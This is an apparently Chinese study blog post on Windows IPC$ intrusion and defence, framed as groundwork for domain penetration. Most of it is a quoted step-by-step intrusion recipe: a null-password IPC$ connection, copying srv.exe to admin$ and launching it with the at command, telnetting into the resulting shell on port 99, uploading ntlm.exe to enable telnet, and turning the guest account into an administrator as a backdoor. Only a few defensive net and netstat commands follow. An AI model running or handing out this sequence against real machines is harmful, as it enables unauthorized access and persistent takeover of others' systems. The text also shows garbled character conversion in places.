域滲透學習預備知識-IPC$的入侵防護

1、什麼是IPC$

如下段落引文自：http://www.xfocus.net/articles/200303/493.html　　

IPC$(Internet Process Connection)是共享"命名管道"的資源(你們都是這麼說的)，它是爲了讓進程間通訊而開放的命名管道，能夠經過驗證用戶名和密碼得到相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。利用IPC$,鏈接者甚至能夠與目標主機創建一個空的鏈接而無需用戶名與密碼(固然,對方機器必須開了ipc$共享,不然你是鏈接不上的)，而利用這個空的鏈接，鏈接者還能夠獲得目標主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)。咱們總在說ipc$漏洞ipc$漏洞,其實,ipc$並非真正意義上的漏洞,它是爲了方便管理員的遠程管理而開放的遠程網絡登錄功能,並且還打開了默認共享,即全部的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。全部的這些,初衷都是爲了方便管理員的管理,但好的初衷並不必定有好的收效,一些別有用心者(究竟是什麼用心?我也不知道,代詞一個)會利用IPC$，訪問共享資源,導出用戶列表,並使用一些字典工具，進行密碼探測,寄但願於得到更高的權限,從而達到不可告人的目的。

2、IPC$入侵防護基礎：

0、操做環境：

 powershell 管理員

一、如何創建IPC$空鏈接：

1 net use \\127.0.0.1\ipc$"" /user:""

二、創建完整的用戶名稱密碼的鏈接：

1 net use \\127.0.0.1\ipc$"password" /user:"username"

三、映射路徑：

1 net use z: \\IP\c$ "密碼" /user:"用戶名"       (便可將對方的c盤映射爲本身的z盤，其餘盤類推)

四、直接訪問和刪除路徑：

1 net use z: \\IP\c$ #直接訪問
2 net use c: /del 刪除映射的c盤，其餘盤類推 
3 net use * /del 刪除所有,會有提示要求按y確認

五、刪除鏈接：

1 net use \\IP\ipc$ /del

六、引用上文地址博客的一段經典例子：

 1 ###經典入侵模式###
 2 這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創做者!(不知道是哪位前輩) 
 3 
 4 1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 
 5 這是用《流光》掃到的用戶名是administrators，密碼爲"空"的IP地址(空口令?哇,運氣好到家了)，若是是打算攻擊的話，就能夠用這樣的命令來與127.0.0.1創建一個鏈接，由於密碼爲"空"，因此第一個引號處就不用輸入，後面一個雙引號裏的是用戶名，輸入administrators，命令便可成功完成。
 6 　　
 7 2. C:\>copy srv.exe \\127.0.0.1\admin$ 
 8 先複製srv.exe上去，在流光的Tools目錄下就有（這裏的$是指admin用戶的c:\winnt\system32\，你們還可使用c$、d$，意思是C盤與D盤，這看你要複製到什麼地方去了）。
 9 　　
10 3. C:\>net time \\127.0.0.1 
11 查查時間，發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00，命令成功完成。
12 　　
13 4. C:\>at \\127.0.0.1 11:05 srv.exe 
14 用at命令啓動srv.exe吧（這裏設置的時間要比主機時間快，否則你怎麼啓動啊，呵呵！） 
15 　　
16 5. C:\>net time \\127.0.0.1
17 再查查到時間沒有？若是127.0.0.1 的當前時間是 2002/3/19 上午 11:05，那就準備開始下面的命令。
18 　　
19 6. C:\>telnet 127.0.0.1 99 
20 這裏會用到Telnet命令吧，注意端口是99。Telnet默認的是23端口，可是咱們使用的是SRV在對方計算機中爲咱們創建一個99端口的Shell。
21 雖然咱們能夠Telnet上去了，可是SRV是一次性的，下次登陸還要再激活！因此咱們打算創建一個Telnet服務！這就要用到ntlm了
22 　　
23 7.C:\>copy ntlm.exe \\127.0.0.1\admin$
24 用Copy命令把ntlm.exe上傳到主機上（ntlm.exe也是在《流光》的Tools目錄中）。
25 　　
26 8. C:\WINNT\system32>ntlm 
27 輸入ntlm啓動（這裏的C:\WINNT\system32>指的是對方計算機，運行ntlm實際上是讓這個程序在對方計算機上運行）。當出現"DONE"的時候，就說明已經啓動正常。而後使用"net start telnet"來開啓Telnet服務！ 
28 
29 9. Telnet 127.0.0.1，接着輸入用戶名與密碼就進入對方了，操做就像在DOS上操做同樣簡單！(而後你想作什麼?想作什麼就作什麼吧,哈哈)
30 
31 爲了以防萬一,咱們再把guest激活加到管理組    
32 10. C:\>net user guest /active:yes 
33 將對方的Guest用戶激活
34 
35 11. C:\>net user guest 1234 
36 將Guest的密碼改成1234,或者你要設定的密碼
37 
38 12. C:\>net localgroup administrators guest /add 
39 將Guest變爲Administrator^_^(若是管理員密碼更改，guest賬號沒改變的話，下次咱們能夠用guest再次訪問這臺計算機)

七、防護命令：

1 net share #查看本身的共享
2 net view \\IP #查看target的共享
3 netstat -A IP 獲取target的user列表

八、netstat的延伸使用方法：

netstat -ano | findstr "port" #查看端口號對應的PID
tasklist | findstr "PID" #查看進程號對應的程序